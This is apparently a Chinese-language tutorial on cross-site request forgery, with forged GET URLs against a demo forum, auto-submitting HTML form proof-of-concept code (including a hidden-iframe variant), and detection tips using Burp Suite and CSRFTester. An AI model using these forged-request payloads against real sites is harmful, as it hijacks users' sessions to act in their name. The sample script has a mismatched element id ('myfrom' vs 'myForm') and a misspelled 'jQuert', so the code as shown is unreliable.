什么是CSRF
CSRF(Cross-site Request Forgery),跨站请求伪造。
是在正常用户不知情的条件下,Hacker将恶意请求伪造成该用户的请求发出的攻击。相当于是你的身份被盗用,攻击者可以以你的名义做很多事情,造成个人隐私泄露财产安全等问题。
原理
两个重点:
- CSRF的攻击建立在浏览器与Web服务器的会话中;(原会话有效)
- 欺骗用户访问恶意URL。
攻击场景
GET
假设www.csrfdemo.com是一个论坛平台,对它的关注功能进行抓包,对截取到的HTTP请求内容进行分析,发现在关注某个人时,url会变成:
http://www.csrfdemo.com/follow?uid=789254&follow=854632
其中,uid是用户的ID,follow是被关注者的ID。
那么构造url:
http://www.csrfdemo.com/follow?uid=482365&follow=854632
那么用户482365可以不通过Web应用程序,直接点击这个链接,他就关注了用户854632。
甚至直接构造如下url:
http://www.csrfdemo.com/follow?follow=854632
被其他用户点击之后,这些用户就会在他们不知情的情况下关注用户854632。
当然,如果发现该论坛发帖时url会变成:
http://www.csrfdemo.com/text?uid=xxxxxx&content=xxx
那么只要构造url:
http://www.csrfdemo.com/text?uid=854632&content=我是一个小胖子
当用户854632在未登出该论坛的条件下点击了这个url,他就会在非自愿的情况下,发出了一条标题为“我是一个小胖子”的帖子。(就很过分)
POST
当开发人员把接收方式改为POST时,URL就不起作用了。但是其实也很很简单。
写一个HTML文档,构造一个form表单,利用JavaScript自动提交表单,这样只要打开这个HTML文档,就会自动提交POST数据,核心代码如下:
<form id="myForm" method="post" action="http://www.csrfdemo.com/follow">
<input type="hidden" name="follow" value="854632">
</form>
<script>
var myForm = document.getElementById("myfrom");
myForm.submit();
</script>
在上面的代码中,action值代表打开这个HTML文档后会自动跳转到的页面。那么如果我们需要悄咪咪地不被用户察觉的情况下提交数据要怎么办呢?
方法一:使用AJAX
通过jquery-form插件提交请求,语法如下:
jQuert.post(url, data,success(data, textStatus, jqXHR), dataType)
其中,
url:请求所要发送到的URL;
data:请求中要发送到服务器的数据,可选;
success函数:请求成功时执行的回调函数,可选;
dataType:服务器相应的数据类型,可选。
方法二:指定form表单的target
这种方法我们需要将URL在<iframe>标签中打开,然后隐藏我们的<iframe>。核心代码如下:
<iframe frameborder="0" name="myIframe" width="0px" height="0px"></iframe>
<form id="myForm" method="post" target="myIframe" action="http://www.csrfdemo.com/follow">
<input type="hidden" name="follow" value="854632">
</form>
<script>
var myForm = document.getElementById("myfrom");
myForm.submit();
</script>
漏洞检测
手工检测
关键点:CSRF实际上是劫持用户的正规操作进行攻击。
首先确定Web应用程序中的敏感操作,然后拦截相关HTTP请求,确定某操作(例如删除用户操作)的URL中各参数项的意义,然后编写CSRF POC验证该功能是否存在CSRF漏洞。
如果编写的POC被执行,则存在CSRF漏洞,否则不存在。
半自动检测
使用Burp Suite中的Scanner模块检测CSRF漏洞;
或者,使用OWASP组织提供的CSRF半自动检测工具:CSRFTester。
